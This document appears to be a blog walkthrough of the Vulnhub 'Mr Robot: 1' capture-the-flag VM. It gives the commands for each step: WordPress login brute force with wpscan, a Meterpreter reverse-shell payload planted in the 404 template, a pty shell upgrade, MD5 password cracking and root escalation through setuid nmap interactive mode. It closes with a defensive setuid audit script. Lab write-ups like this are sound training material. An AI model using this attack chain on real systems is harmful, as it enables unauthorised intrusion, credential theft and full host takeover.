Mr Robot:1 CTF Walkthrough



Mr Robot: 1 CTF (Capture the Flag) is a downloadable virtual machine from Vulnhub, a site that has purposely built virtual machines for you to hack. Each one varies in difficulty and allows you to hone your skills and even pick up new ones.


If you're interested in giving it a go yourself, this virtual machine can be downloaded here


Based on the show Mr Robot.

This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.

The VM isn't too difficult. There isn't any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

So I downloaded the virtual machine from Vulnhub and then just double-clicked the mrRobot.ova file and it set itself up in VirtualBox.

I set the network up so only the Mr Robot VM and Kali Linux were on the same subnet, to make it easier to find, and you don’t really want to be exposing vulnerable virtual machines on your live network. The VM has DHCP enabled so it gets a DHCP lease straight off the bat.

My first step is to find out what IP the VM is on and what goodies it has to offer, so I run Nmap to find all this out for me.

nmap -A

and it gives me this information back.

Nmap scan report for
Host is up (0.00029s latency).
Not shown: 997 filtered ports
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject:
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
MAC Address: 08:00:27:C1:4A:90 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.10 - 3.19

Network Distance: 1 hop


1 0.29 ms

As you can see, it looks like we have an Apache web server running with ports 80 and 443 open, so let's check them out first.



With both HTTP and HTTPS we get presented with a cool animation of a Linux terminal booting up and Mr Robot logging in.



At the prompt the only commands that work are the 6 listed above. Each one takes you to its own page, which contains all sorts of Mr Robot propaganda; it looks like it's a rip of a Mr Robot promotional website. I took note of each page just in case I needed it later.

Looking at the source we can see this animation has been created in JavaScript. There is also some interesting info on line 15. I would like to just add “I am not an expert in JavaScript”, but it looks like if you have an IP of you get taken to index.html.



At this stage I thought it was time to check out the robots.txt

User-agent: *

Boom! So it looks like I have found key-1-of-3.txt and a fsocity.dic file.

I first navigate to the key file at and get the first key 073403c8a58a1f80d943455fb30724b9

Then I download fsocity.dic, which is just a dictionary file. I’m guessing this is something that we will have to use later, so I'll keep that somewhere safe.

When the dictionary file had finished downloading, I kind of just mashed the keyboard with adfsda after the IP address and I received a WordPress 404 page as below



Clicking around the menus, I quite quickly found the WordPress login page at

Now we know it's a WordPress site we can try and enumerate users using Wpscan

wpscan --url --enumerate u

This actually did not find any users for me, so I started to use process of elimination and tried admin, root and user, all giving me an Invalid username


So still with no users, I start to use names from characters in the TV series, starting at mrrobot, flipper and then we get a hit with elliot.

elliotwrong password

Cool, so we have a user. The next step will be to use that dictionary file we downloaded earlier and see if we can brute force the password for this account. So let's take a look at the dictionary file…

The first thing I notice when I cat the dictionary file is that it's not in any sequential order. This can be rectified by just running a sort command in the Linux terminal

sort fsocity.dic >fsocitysorted.dic

I cat the new fsocitysorted.dic file and noticed there are a lot of repeated words, so we can run the sort command again but pipe it into the uniq command as below, giving us a nice and tidy dictionary file for us to run our brute force against.

sort fsocity.dic | uniq > fsocitysortunique.dic

So let's use wpscan again to brute force the login using our new dictionary file, like so.

wpscan --url --wordlist /location/of/wordlist/fsocitysortunique.dic --username elliot



This took about 3 minutes to find this password for elliot.

  | Id | Login  | Name | Password  |
  |    | elliot |      | ER28-0652 |

I put the above details in to page and bingo we are into the WordPress dashboard.



Now we are into the WordPress dashboard we can quite easily use Metasploit to create a payload and gain a shell on the web server.

Our first step is to create our Metasploit payload using msfvenom.

msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=7771 -f raw -o payload.php

Now we have our payload, we need to get this on the site and run it. The best place for this is the 404 page template

In the dashboard go to the menu on the left and click on Appearance –> Editor –> then on the right click 404 Template.

Next open up your payload with any text editor and copy the contents over the top of the 404 template and click update file.

Now we need to create our payload handler in Metasploit, so open up a new terminal and type …..

$ msfconsole
$ use exploit/multi/handler
$ set payload php/meterpreter/reverse_tcp
$ set LHOST
$ set LPORT 7771
$ run

After you typed ‘run’ and hit enter your payload handler should start and all we need to do now is run our payload by making the site display a 404 page and we are in.

[*] Started reverse TCP handler on 
[*] Starting the payload handler...
[*] Sending stage (33721 bytes) to
[*] Meterpreter session 1 opened ( -> at 2016-08-19 17:00:48 +0100

meterpreter > 

Then in meterpreter just type shell to spawn a shell on the box and then check what directory  we are in and which user we are.

meterpreter > shell 
Process 1797 created.
Channel 0 created. 

Then I changed directory to the root of the drive and listed everything that’s there.

cd / 

I start by checking out the home folder, this seems to have just one folder in it called robot, so I navigate into the robot folder and it looks like we have found our next key and an md5 file.

cd home
cd robot

First I try to cat the contents of the key file, but I get a permission denied. I also try the password.raw-md5 file; this time it does display the contents on the screen, see below.

cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
cat password.raw-md5

So it looks like we have a username and an MD5-hashed password. I could run this through hashcat, but I thought as this is an easy hackable VM, I would google the hash first, and as I thought, the hash comes back quite quickly as abcdefghijklmnopqrstuvwxyz.


I try and switch user to robot but I keep getting a message telling me that su must be run from terminal.

su robot 
su: must be run from a terminal

This shows that we don’t have a proper shell running, so we can use a bit of python foo to get full terminal access using this command below.

python -c 'import pty; pty.spawn("/bin/bash")'

We can tell we are in the proper shell as the start of the line tells us what user we are, the name of the server and then what folder we are in.

[email protected]:/home/robot$

So we try and switch to the robot user again and we now get a prompt to enter the password. Once we have entered the password for the MD5 hash we are now logged in as robot.

[email protected]:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz

[email protected]:~$

Now that we are logged in as robot, we should be able to cat the contents of that key file as we now have the right permissions.

[email protected]:~$ cat key-2-of-3.txt
cat key-2-of-3.txt

Now with key 2 found we just have one more to find. I’m guessing to do this we need to escalate privileges again to become the root user. I tried a few exploits off ExploitDB but none of these worked, so I started looking at other ways to get to root.

Listing the files that have the setuid or setgid bit set shows Nmap is set to run as root.

find / -perm /6000 2>/dev/null | grep '/bin/'

After a lot of googling I found there is a vulnerability in Nmap: it can be put into interactive mode, which allows you to run shell commands directly in Nmap.

[email protected]:/$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
# ls
bin   dev  home        lib    lost+found  mnt  proc  run   srv tmp  var
boot  etc  initrd.img  lib64  media   opt  root  sbin  sys usr  vmlinuz
# cd /root
cd /root
# ls
firstboot_done key-3-of-3.txt

So we escalated our privileges to root through the interactive shell and navigated to the root folder. As you can see above, this holds our final key, which we cat to give us ….

cat key-3-of-3.txt
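
The root cause of the last step is a setuid-root binary that can hand out a shell, and the same permission check can be run as a routine audit. The script below is an added example, not part of the original walkthrough: it reports setuid/setgid files that are missing from a baseline. The baseline and the sample paths and modes are constructed assumptions.

```python
import os
import stat

# Assumption: binaries this host is expected to ship setuid/setgid (site-specific baseline).
BASELINE = {"/bin/su", "/bin/mount", "/bin/ping", "/usr/bin/passwd", "/usr/bin/sudo"}

def scan(root="/"):
    """Yield (path, st_mode, st_uid) for every regular file under root."""
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable; skip it
            if stat.S_ISREG(st.st_mode):
                yield path, st.st_mode, st.st_uid

def audit(entries, baseline=BASELINE):
    """Return sorted findings for setuid/setgid files that are not in the baseline."""
    findings = []
    for path, mode, uid in entries:
        bits = [name for name, bit in (("setuid", stat.S_ISUID), ("setgid", stat.S_ISGID))
                if mode & bit]
        if not bits or path in baseline:
            continue
        # setuid and owned by root: every local user runs this file as root
        severity = "high" if "setuid" in bits and uid == 0 else "review"
        findings.append((severity, path, "+".join(bits), stat.filemode(mode)))
    return sorted(findings)

# Constructed entries mirroring the walkthrough's finding (paths and modes are sample data).
SAMPLE = [
    ("/usr/bin/passwd", 0o104755, 0),
    ("/usr/local/bin/nmap", 0o104755, 0),
    ("/usr/bin/wall", 0o102755, 0),
    ("/bin/ls", 0o100755, 0),
]

if __name__ == "__main__":
    for finding in audit(SAMPLE):  # replace SAMPLE with scan("/") on a real host
        print(*finding)
```

A "high" finding that has no reason to run as root is fixed by clearing the bit, for example with chmod u-s on the reported path.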

Now we have all 3 keys that’s this Virtual Machine done… It was a really good virtual machine to get started with, also finding out about the privilege escalation using Nmap was fantastic and being a fan of Mr Robot TV show really helped with keeping me interested.

Going to go have another look at Vulnhub and see if there are any more TV/movie tie-ins that I can sink my teeth into….


